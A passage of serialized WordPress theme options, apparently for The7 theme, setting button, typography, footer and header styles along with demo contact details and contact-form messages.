0px\";s:13:\"button-shadow\";a:6:{s:5:\"color\";s:13:\"rgba(0,0,0,0)\";s:10:\"horizontal\";s:1:\"0\";s:8:\"vertical\";s:1:\"0\";s:4:\"blur\";s:2:\"10\";s:6:\"spread\";s:1:\"0\";s:8:\"position\";s:7:\"outline\";}s:19:\"button-shadow-hover\";a:6:{s:5:\"color\";s:13:\"rgba(0,0,0,0)\";s:10:\"horizontal\";s:1:\"0\";s:8:\"vertical\";s:1:\"0\";s:4:\"blur\";s:2:\"10\";s:6:\"spread\";s:1:\"0\";s:8:\"position\";s:7:\"outline\";}s:20:\"buttons-border-color\";s:7:\"#ffffff\";s:25:\"buttons-border-color_mode\";s:6:\"accent\";s:13:\"buttons-color\";s:7:\"#81d742\";s:22:\"buttons-color_gradient\";s:31:\"135deg|#13aa4a 30%|#84df31 100%\";s:18:\"buttons-color_mode\";s:6:\"accent\";s:26:\"buttons-hover-border-color\";s:7:\"#ffffff\";s:31:\"buttons-hover-border-color_mode\";s:6:\"accent\";s:19:\"buttons-hover_color\";s:7:\"#81d742\";s:28:\"buttons-hover_color_gradient\";s:31:\"135deg|#23aadd 30%|#37ce9d 100%\";s:24:\"buttons-hover_color_mode\";s:8:\"gradient\";s:26:\"buttons-l-custom-icon-size\";s:1:\"1\";s:19:\"buttons-l-icon-size\";s:2:\"18\";s:20:\"buttons-l-min-height\";s:3:\"1px\";s:19:\"buttons-l-min-width\";s:3:\"1px\";s:20:\"buttons-l-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"18\";}s:23:\"buttons-l_border_radius\";s:3:\"1px\";s:22:\"buttons-l_border_width\";s:3:\"0px\";s:17:\"buttons-l_padding\";s:19:\"16px 24px 16px 24px\";s:27:\"buttons-lg-custom-icon-size\";b:0;s:26:\"buttons-m-custom-icon-size\";s:1:\"1\";s:19:\"buttons-m-icon-size\";s:2:\"14\";s:20:\"buttons-m-min-height\";s:3:\"1px\";s:19:\"buttons-m-min-width\";s:3:\"1px\";s:20:\"buttons-m-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"14\";}s:23:\"buttons-m_border_radius\";s:3:\"1px\";s:22:\"buttons-m_border_width\";s:3:\"0px\";s:17:\"buttons-m_padding\";s:19:\"12px 18px 12px 18px\";s:26:\"buttons-s-custom-icon-size\";s:1:\"1\";s:19:\"buttons-s-icon-size\";s:2:\"12\";s:20:\"buttons-s-min-height\";s:3:\"1px\";s:19:\"buttons-s-min-width\";s:3:\"1px\";s:20:\"buttons-s-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"12\";}s:23:\"buttons-s_border_radius\";s:3:\"1px\";s:22:\"buttons-s_border_width\";s:3:\"0px\";s:17:\"buttons-s_padding\";s:17:\"8px 14px 7px 14px\";s:18:\"buttons-text_color\";s:7:\"#ffffff\";s:23:\"buttons-text_color_mode\";s:5:\"color\";s:24:\"buttons-text_hover_color\";s:7:\"#ffffff\";s:29:\"buttons-text_hover_color_mode\";s:5:\"color\";s:27:\"buttons-xl-custom-icon-size\";b:0;s:20:\"contact_form_message\";s:1:\"1\";s:33:\"contact_form_recaptcha_secret_key\";s:0:\"\";s:31:\"contact_form_recaptcha_site_key\";s:0:\"\";s:27:\"contact_form_security_token\";s:20:\"eed685ff90c0efbbe983\";s:21:\"content-headers_color\";s:7:\"#333333\";s:19:\"content-links_color\";s:7:\"#1ebbf0\";s:26:\"content-primary_text_color\";s:7:\"#8b8d94\";s:28:\"content-secondary_text_color\";s:7:\"#adafb3\";s:21:\"custom_error_messages\";s:48:\"The message has not been sent. Plaese try again.\";s:32:\"custom_error_messages_validation\";s:61:\"One or more fields have an error. Please check and try again.\";s:23:\"custom_success_messages\";s:27:\"Your message has been sent.\";s:14:\"dividers-color\";s:16:\"rgba(0,0,0,0.08)\";s:17:\"filter-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"14\";}s:14:\"fonts-big_size\";a:2:{s:9:\"font_size\";s:4:\"16px\";s:11:\"line_height\";s:5:\"1.6em\";}s:17:\"fonts-font_family\";s:6:\"Roboto\";s:19:\"fonts-h1-typography\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:20:\"responsive_font_size\";a:3:{s:7:\"desktop\";s:4:\"52px\";s:6:\"tablet\";s:4:\"34px\";s:6:\"mobile\";s:4:\"34px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"62px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h2-typography\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"34px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"44px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h3-typography\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"24px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"34px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h4-typography\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"20px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"30px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h5-typography\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"16px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"26px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h6-typography\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"14px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"24px\";}s:14:\"text_transform\";s:4:\"none\";}s:25:\"fonts-headers-font-family\";s:0:\"\";s:28:\"fonts-headers-text-transform\";s:0:\"\";s:17:\"fonts-normal_size\";a:2:{s:9:\"font_size\";s:4:\"15px\";s:11:\"line_height\";s:5:\"1.5em\";}s:16:\"fonts-small_size\";a:2:{s:9:\"font_size\";s:4:\"13px\";s:11:\"line_height\";s:5:\"1.4em\";}s:20:\"fonts-widget-content\";a:4:{s:11:\"font_family\";s:5:\"Arial\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"13px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"20px\";}s:14:\"text_transform\";s:4:\"none\";}s:18:\"fonts-widget-title\";a:4:{s:11:\"font_family\";s:5:\"Arial\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"15px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"20px\";}s:14:\"text_transform\";s:4:\"none\";}s:24:\"footer-accent_text_color\";s:0:\"\";s:15:\"footer-bg_color\";s:16:\"rgba(26,28,32,1)\";s:15:\"footer-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:3:\"top\";}s:21:\"footer-collapse_after\";s:5:\"778px\";s:29:\"footer-collapse_columns_after\";s:5:\"992px\";s:17:\"footer-decoration\";s:4:\"none\";s:27:\"footer-decoration-line_size\";s:3:\"1px\";s:31:\"footer-decoration_outline_color\";s:21:\"rgba(129,215,66,0.96)\";s:20:\"footer-headers_color\";s:7:\"#eeeeee\";s:19:\"footer-is_fullwidth\";s:1:\"0\";s:13:\"footer-layout\";s:15:\"1/4+1/4+1/4+1/4\";s:21:\"footer-mobile_padding\";s:19:\"50px 20px 15px 20px\";s:14:\"footer-padding\";s:19:\"50px 50px 15px 50px\";s:23:\"footer-paddings-columns\";s:4:\"25px\";s:25:\"footer-primary_text_color\";s:7:\"#8b8d94\";s:21:\"footer-slide-out-mode\";s:1:\"0\";s:12:\"footer-style\";s:16:\"solid_background\";s:23:\"general-accent_bg_color\";s:7:\"#5891e8\";s:32:\"general-accent_bg_color_gradient\";s:31:\"135deg|#1ebbf0 30%|#39dfaa 100%\";s:25:\"general-accent_color_mode\";s:8:\"gradient\";s:25:\"general-beautiful_loading\";s:7:\"enabled\";s:16:\"general-bg_color\";s:19:\"rgba(255,255,255,0)\";s:16:\"general-bg_fixed\";b:0;s:21:\"general-bg_fullscreen\";b:0;s:16:\"general-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:3:\"top\";}s:24:\"general-blog_meta_author\";s:1:\"1\";s:28:\"general-blog_meta_categories\";s:1:\"1\";s:26:\"general-blog_meta_comments\";s:1:\"1\";s:22:\"general-blog_meta_date\";s:1:\"1\";s:20:\"general-blog_meta_on\";s:1:\"1\";s:22:\"general-blog_meta_tags\";s:1:\"1\";s:21:\"general-border_radius\";s:3:\"0px\";s:17:\"general-box_width\";s:6:\"1280px\";s:22:\"general-boxed_bg_color\";s:7:\"#ffffff\";s:22:\"general-boxed_bg_fixed\";s:1:\"1\";s:27:\"general-boxed_bg_fullscreen\";s:1:\"1\";s:22:\"general-boxed_bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:9:\"no-repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:28:\"general-breadcrumbs_bg_color\";s:8:\"disabled\";s:25:\"general-breadcrumbs_color\";s:7:\"#adafb3\";s:33:\"general-contact_form_send_mail_to\";s:0:\"\";s:30:\"general-content_boxes_bg_color\";s:16:\"rgba(0,0,0,0.04)\";s:32:\"general-content_boxes_decoration\";s:4:\"none\";s:46:\"general-content_boxes_decoration_outline_color\";s:13:\"rgba(0,0,0,0)\";s:21:\"general-content_width\";s:6:\"1300px\";s:18:\"general-custom_css\";s:146:\".sub-nav .menu-item i.fa,\n.sub-nav .menu-item i.fas,\n.sub-nav .menu-item i.far,\n.sub-nav .menu-item i.fab {\n	text-align: center;\n	width: 1.25em;\n}\";s:21:\"general-custom_loader\";s:0:\"\";s:15:\"general-favicon\";s:0:\"\";s:18:\"general-favicon_hd\";s:0:\"\";s:21:\"general-filter-margin\";s:15:\"0px 3px 0px 3px\";s:22:\"general-filter-padding\";s:17:\"6px 15px 6px 15px\";s:20:\"general-filter_style\";s:7:\"minimal\";s:39:\"general-filter_style-material-line_size\";s:3:\"2px\";s:42:\"general-filter_style-minimal-border_radius\";s:5:\"100px\";s:32:\"general-fullscreen_overlay_color\";s:19:\"rgba(255,255,255,1)\";s:37:\"general-fullscreen_overlay_color_mode\";s:5:\"color\";s:35:\"general-fullscreen_overlay_gradient\";s:31:\"135deg|#2edded 30%|#0084bb 100%\";s:34:\"general-fullscreen_overlay_opacity\";s:3:\"100\";s:30:\"general-handheld_icon-old_ipad\";s:0:\"\";s:32:\"general-handheld_icon-old_iphone\";s:0:\"\";s:33:\"general-handheld_icon-retina_ipad\";s:0:\"\";s:35:\"general-handheld_icon-retina_iphone\";s:0:\"\";s:27:\"general-images_lazy_loading\";s:1:\"1\";s:14:\"general-layout\";s:4:\"wide\";s:27:\"general-lightbox_arrow_size\";s:4:\"62px\";s:32:\"general-lightbox_overlay_opacity\";s:2:\"85\";s:20:\"general-loader_style\";s:14:\"double_circles\";s:25:\"general-navigation_margin\";s:4:\"50px\";s:25:\"general-next_prev_in_blog\";i:1;s:29:\"general-page-title-typography\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"34\";s:11:\"line_height\";s:2:\"44\";}s:27:\"general-page_content_margin\";s:19:\"70px 50px 70px 50px\";s:34:\"general-page_content_mobile_margin\";s:19:\"70px 20px 70px 20px\";s:29:\"general-portfolio_meta_author\";b:0;s:33:\"general-portfolio_meta_categories\";b:0;s:31:\"general-portfolio_meta_comments\";b:0;s:27:\"general-portfolio_meta_date\";b:0;s:31:\"general-project_back_button_url\";s:0:\"\";s:28:\"general-rel_posts_head_title\";s:13:\"Related Posts\";s:21:\"general-rel_posts_max\";s:1:\"6\";s:28:\"general-rel_projects_details\";b:0;s:28:\"general-rel_projects_excerpt\";b:0;s:32:\"general-rel_projects_info_author\";b:0;s:36:\"general-rel_projects_info_categories\";b:0;s:34:\"general-rel_projects_info_comments\";b:0;s:30:\"general-rel_projects_info_date\";b:0;s:25:\"general-rel_projects_link\";b:0;s:26:\"general-rel_projects_title\";b:0;s:25:\"general-rel_projects_zoom\";b:0;s:18:\"general-responsive\";s:1:\"1\";s:31:\"general-responsive_title_height\";s:3:\"0px\";s:36:\"general-responsive_title_line_height\";s:2:\"34\";s:29:\"general-responsive_title_size\";s:2:\"24\";s:27:\"general-show_author_in_blog\";i:1;s:32:\"general-show_back_button_in_post\";s:1:\"0\";s:24:\"general-show_breadcrumbs\";s:1:\"1\";s:22:\"general-show_rel_posts\";s:1:\"1\";s:19:\"general-show_titles\";s:1:\"1\";s:21:\"general-smooth_scroll\";s:3:\"off\";s:21:\"general-spinner_color\";s:19:\"rgba(51,51,51,0.25)\";s:31:\"general-switch_content_paddings\";s:5:\"778px\";s:19:\"general-title_align\";s:6:\"center\";s:22:\"general-title_bg_color\";s:16:\"rgba(0,0,0,0.04)\";s:27:\"general-title_bg_fullscreen\";b:0;s:25:\"general-title_bg_gradient\";s:31:\"135deg|#4a66d6 30%|#12b4ea 100%\";s:22:\"general-title_bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:21:\"general-title_bg_mode\";s:10:\"background\";s:24:\"general-title_bg_overlay\";b:0;s:25:\"general-title_bg_parallax\";s:1:\"0\";s:19:\"general-title_color\";s:7:\"#333333\";s:24:\"general-title_decoration\";s:4:\"none\";s:35:\"general-title_decoration_line_color\";s:19:\"rgba(51,51,51,0.11)\";s:36:\"general-title_decoration_line_height\";s:3:\"6px\";s:35:\"general-title_decoration_line_style\";s:6:\"double\";s:38:\"general-title_decoration_outline_color\";s:18:\"rgba(30,115,190,0)\";s:39:\"general-title_decoration_outline_height\";s:4:\"10px\";s:38:\"general-title_decoration_outline_style\";s:5:\"solid\";s:27:\"general-title_enable_bg_img\";s:8:\"disabled\";s:20:\"general-title_height\";s:5:\"200px\";s:27:\"general-title_overlay_color\";s:15:\"rgba(0,0,0,0.5)\";s:36:\"general-title_responsive_breadcrumbs\";b:0;s:27:\"general-title_scroll_effect\";s:7:\"default\";s:36:\"general-titles-responsiveness-switch\";s:5:\"778px\";s:29:\"general-titles_responsiveness\";s:1:\"1\";s:21:\"general-tracking_code\";s:0:\"\";s:17:\"header-background\";s:6:\"normal\";s:15:\"header-bg-color\";s:19:\"rgba(255,255,255,1)\";s:15:\"header-bg-image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:18:\"header-bg-is_fixed\";b:0;s:23:\"header-bg-is_fullscreen\";b:0;s:23:\"header-classic-elements\";a:4:{s:12:\"top_bar_left\";a:1:{i:0;s:13:\"working_hours\";}s:13:\"top_bar_right\";a:1:{i:0;s:6:\"search\";}s:15:\"near_menu_right\";a:1:{i:0;s:12:\"social_icons\";}s:15:\"near_logo_right\";a:2:{i:0;s:5:\"phone\";i:1;s:5:\"email\";}}s:51:\"header-classic-elements-near_logo-custom-icon-color\";s:0:\"\";s:50:\"header-classic-elements-near_logo-custom-icon-size\";s:2:\"16\";s:44:\"header-classic-elements-near_logo-font_color\";s:7:\"#888888\";s:44:\"header-classic-elements-near_logo-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:46:\"header-classic-elements-near_logo_left-padding\";s:15:\"0px 0px 0px 0px\";s:47:\"header-classic-elements-near_logo_right-padding\";s:15:\"0px 0px 0px 0px\";s:51:\"header-classic-elements-near_menu-custom-icon-color\";s:0:\"\";s:50:\"header-classic-elements-near_menu-custom-icon-size\";s:2:\"16\";s:44:\"header-classic-elements-near_menu-font_color\";s:7:\"#888888\";s:44:\"header-classic-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:47:\"header-classic-elements-near_menu_right-padding\";s:16:\"0px 0px 0px 40px\";s:21:\"header-classic-height\";s:5:\"180px\";s:27:\"header-classic-is_fullwidth\";s:1:\"0\";s:28:\"header-classic-logo-position\";s:4:\"left\";s:28:\"header-classic-menu-bg-color\";s:13:\"rgba(0,0,0,1)\";s:28:\"header-classic-menu-bg-style\";s:5:\"solid\";s:29:\"header-classic-menu-line_size\";s:3:\"1px\";s:26:\"header-classic-menu-margin\";s:7:\"0px 0px\";s:28:\"header-classic-menu-position\";s:4:\"left\";s:28:\"header-classic-show_elements\";s:1:\"1\";s:27:\"header-classic-side-padding\";s:9:\"30px 30px\";s:30:\"header-classic-switch_paddings\";s:3:\"0px\";s:30:\"header-classic_mobile_paddings\";s:7:\"0px 0px\";s:17:\"header-decoration\";s:6:\"shadow\";s:23:\"header-decoration-color\";s:19:\"rgba(51,51,51,0.11)\";s:27:\"header-decoration-line_size\";s:3:\"1px\";s:27:\"header-elements-button-1-bg\";s:6:\"accent\";s:33:\"header-elements-button-1-bg-color\";s:7:\"#ffffff\";s:36:\"header-elements-button-1-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:37:\"header-elements-button-1-border-color\";s:6:\"accent\";s:42:\"header-elements-button-1-border-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-1-border_radius\";s:3:\"0px\";s:37:\"header-elements-button-1-border_width\";s:3:\"1px\";s:36:\"header-elements-button-1-choose-icon\";s:0:\"\";s:44:\"header-elements-button-1-first-header-switch\";s:9:\"near_logo\";s:33:\"header-elements-button-1-hover-bg\";s:6:\"accent\";s:39:\"header-elements-button-1-hover-bg-color\";s:7:\"#ffffff\";s:42:\"header-elements-button-1-hover-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:43:\"header-elements-button-1-hover-border-color\";s:6:\"accent\";s:48:\"header-elements-button-1-hover-border-color-mono\";s:7:\"#ffffff\";s:41:\"header-elements-button-1-hover-icon-color\";s:5:\"color\";s:50:\"header-elements-button-1-hover-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:46:\"header-elements-button-1-hover-icon-color-mono\";s:7:\"#ffffff\";s:29:\"header-elements-button-1-icon\";b:0;s:35:\"header-elements-button-1-icon-color\";s:5:\"color\";s:44:\"header-elements-button-1-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:40:\"header-elements-button-1-icon-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-1-icon-position\";s:5:\"right\";s:34:\"header-elements-button-1-icon-size\";s:2:\"14\";s:33:\"header-elements-button-1-icon_gap\";s:3:\"5px\";s:29:\"header-elements-button-1-name\";s:6:\"Button\";s:36:\"header-elements-button-1-on-desktops\";s:4:\"show\";s:32:\"header-elements-button-1-padding\";s:19:\"10px 20px 10px 20px\";s:45:\"header-elements-button-1-second-header-switch\";s:7:\"in_menu\";s:38:\"header-elements-button-1-smooth-scroll\";b:0;s:31:\"header-elements-button-1-target\";b:0;s:35:\"header-elements-button-1-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"14\";}s:28:\"header-elements-button-1-url\";s:0:\"\";s:27:\"header-elements-button-2-bg\";s:6:\"accent\";s:33:\"header-elements-button-2-bg-color\";s:7:\"#ffffff\";s:36:\"header-elements-button-2-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:37:\"header-elements-button-2-border-color\";s:6:\"accent\";s:42:\"header-elements-button-2-border-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-2-border_radius\";s:3:\"0px\";s:37:\"header-elements-button-2-border_width\";s:3:\"1px\";s:36:\"header-elements-button-2-choose-icon\";s:0:\"\";s:44:\"header-elements-button-2-first-header-switch\";s:9:\"near_logo\";s:33:\"header-elements-button-2-hover-bg\";s:6:\"accent\";s:39:\"header-elements-button-2-hover-bg-color\";s:7:\"#ffffff\";s:42:\"header-elements-button-2-hover-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:43:\"header-elements-button-2-hover-border-color\";s:6:\"accent\";s:48:\"header-elements-button-2-hover-border-color-mono\";s:7:\"#ffffff\";s:41:\"header-elements-button-2-hover-icon-color\";s:5:\"color\";s:50:\"header-elements-button-2-hover-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:46:\"header-elements-button-2-hover-icon-color-mono\";s:7:\"#ffffff\";s:29:\"header-elements-button-2-icon\";b:0;s:35:\"header-elements-button-2-icon-color\";s:5:\"color\";s:44:\"header-elements-button-2-icon-color-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:40:\"header-elements-button-2-icon-color-mono\";s:7:\"#ffffff\";s:38:\"header-elements-button-2-icon-position\";s:5:\"right\";s:34:\"header-elements-button-2-icon-size\";s:2:\"14\";s:33:\"header-elements-button-2-icon_gap\";s:3:\"5px\";s:29:\"header-elements-button-2-name\";s:6:\"Button\";s:36:\"header-elements-button-2-on-desktops\";s:4:\"show\";s:32:\"header-elements-button-2-padding\";s:19:\"10px 20px 10px 20px\";s:45:\"header-elements-button-2-second-header-switch\";s:7:\"in_menu\";s:38:\"header-elements-button-2-smooth-scroll\";b:0;s:31:\"header-elements-button-2-target\";b:0;s:35:\"header-elements-button-2-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"14\";}s:28:\"header-elements-button-2-url\";s:0:\"\";s:39:\"header-elements-contact-address-caption\";s:44:\"8500 Beverly Boulevard Los Angeles, CA 90048\";s:43:\"header-elements-contact-address-custom-icon\";s:25:\"the7-mw-icon-address-bold\";s:51:\"header-elements-contact-address-first-header-switch\";s:9:\"near_logo\";s:36:\"header-elements-contact-address-icon\";s:6:\"custom\";s:43:\"header-elements-contact-address-on-desktops\";s:4:\"show\";s:52:\"header-elements-contact-address-second-header-switch\";s:7:\"in_menu\";s:35:\"header-elements-contact-address-url\";s:0:\"\";s:37:\"header-elements-contact-clock-caption\";s:32:\"Monday – Friday 10 AM – 8 PM\";s:41:\"header-elements-contact-clock-custom-icon\";s:31:\"icomoon-the7-font-the7-clock-01\";s:49:\"header-elements-contact-clock-first-header-switch\";s:12:\"top_bar_left\";s:34:\"header-elements-contact-clock-icon\";s:6:\"custom\";s:41:\"header-elements-contact-clock-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-clock-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-clock-url\";s:0:\"\";s:37:\"header-elements-contact-email-caption\";s:18:\"sales@yoursite.com\";s:41:\"header-elements-contact-email-custom-icon\";s:22:\"the7-mw-icon-mail-bold\";s:49:\"header-elements-contact-email-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-contact-email-icon\";s:6:\"custom\";s:41:\"header-elements-contact-email-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-email-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-email-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_1-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_1-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_1-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_1-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_1-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_1-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_1-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_2-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_2-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_2-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_2-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_2-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_2-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_2-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_3-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_3-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_3-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_3-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_3-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_3-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_3-url\";s:0:\"\";s:46:\"header-elements-contact-multipurpose_4-caption\";s:0:\"\";s:50:\"header-elements-contact-multipurpose_4-custom-icon\";s:0:\"\";s:58:\"header-elements-contact-multipurpose_4-first-header-switch\";s:9:\"near_logo\";s:43:\"header-elements-contact-multipurpose_4-icon\";s:6:\"custom\";s:50:\"header-elements-contact-multipurpose_4-on-desktops\";s:4:\"show\";s:59:\"header-elements-contact-multipurpose_4-second-header-switch\";s:7:\"in_menu\";s:42:\"header-elements-contact-multipurpose_4-url\";s:0:\"\";s:37:\"header-elements-contact-phone-caption\";s:13:\"011 322 44 56\";s:41:\"header-elements-contact-phone-custom-icon\";s:31:\"icomoon-the7-font-the7-phone-06\";s:49:\"header-elements-contact-phone-first-header-switch\";s:12:\"top_bar_left\";s:34:\"header-elements-contact-phone-icon\";s:6:\"custom\";s:41:\"header-elements-contact-phone-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-phone-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-phone-url\";s:0:\"\";s:37:\"header-elements-contact-skype-caption\";s:10:\"Your_Skype\";s:41:\"header-elements-contact-skype-custom-icon\";s:23:\"the7-mw-icon-skype-bold\";s:49:\"header-elements-contact-skype-first-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-contact-skype-icon\";s:6:\"custom\";s:41:\"header-elements-contact-skype-on-desktops\";s:4:\"show\";s:50:\"header-elements-contact-skype-second-header-switch\";s:7:\"in_menu\";s:33:\"header-elements-contact-skype-url\";s:0:\"\";s:29:\"header-elements-login-caption\";s:5:\"Login\";s:33:\"header-elements-login-custom-icon\";s:23:\"the7-mw-icon-login-bold\";s:41:\"header-elements-login-first-header-switch\";s:9:\"near_logo\";s:26:\"header-elements-login-icon\";s:6:\"custom\";s:32:\"header-elements-login-logout_url\";s:0:\"\";s:33:\"header-elements-login-on-desktops\";s:4:\"show\";s:42:\"header-elements-login-second-header-switch\";s:7:\"in_menu\";s:25:\"header-elements-login-url\";s:23:\"https://themeforest.net\";s:36:\"header-elements-login-use_logout_url\";b:0;s:30:\"header-elements-logout-caption\";s:6:\"Logout\";s:40:\"header-elements-menu-first-header-switch\";s:9:\"near_logo\";s:25:\"header-elements-menu-icon\";s:6:\"custom\";s:32:\"header-elements-menu-on-desktops\";s:4:\"show\";s:41:\"header-elements-menu-second-header-switch\";s:6:\"hidden\";s:26:\"header-elements-menu-style\";s:8:\"dropdown\";s:39:\"header-elements-menu-style-first-switch\";s:8:\"dropdown\";s:40:\"header-elements-menu-style-second-switch\";s:8:\"dropdown\";s:41:\"header-elements-menu2-first-header-switch\";s:9:\"near_logo\";s:26:\"header-elements-menu2-icon\";s:6:\"custom\";s:33:\"header-elements-menu2-on-desktops\";s:4:\"show\";s:42:\"header-elements-menu2-second-header-switch\";s:7:\"in_menu\";s:27:\"header-elements-menu2-style\";s:8:\"dropdown\";s:40:\"header-elements-menu2-style-first-switch\";s:8:\"dropdown\";s:41:\"header-elements-menu2-style-second-switch\";s:8:\"dropdown\";s:33:\"header-elements-menu2_custom-icon\";s:31:\"the7-mw-icon-dropdown-menu-bold\";s:32:\"header-elements-menu_custom-icon\";s:31:\"the7-mw-icon-dropdown-menu-bold\";s:25:\"header-elements-search-by\";s:7:\"general\";s:30:\"header-elements-search-caption\";s:0:\"\";s:42:\"header-elements-search-first-header-switch\";s:9:\"near_logo\";s:27:\"header-elements-search-icon\";s:6:\"custom\";s:36:\"header-elements-search-input-caption\";s:22:\"Type and hit enter …\";s:34:\"header-elements-search-on-desktops\";s:4:\"show\";s:43:\"header-elements-search-second-header-switch\";s:9:\"near_logo\";s:34:\"header-elements-search_custom-icon\";s:24:\"the7-mw-icon-search-bold\";s:25:\"header-elements-soc_icons\";a:4:{i:1;a:2:{s:4:\"icon\";s:8:\"facebook\";s:3:\"url\";s:1:\"/\";}i:2;a:2:{s:4:\"icon\";s:7:\"twitter\";s:3:\"url\";s:1:\"/\";}i:3;a:2:{s:4:\"icon\";s:9:\"instagram\";s:3:\"url\";s:1:\"/\";}i:4;a:2:{s:4:\"icon\";s:8:\"you-tube\";s:3:\"url\";s:1:\"/\";}}s:28:\"header-elements-soc_icons-bg\";s:5:\"color\";s:34:\"header-elements-soc_icons-bg-color\";s:16:\"rgba(0,0,0,0.07)\";s:37:\"header-elements-soc_icons-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 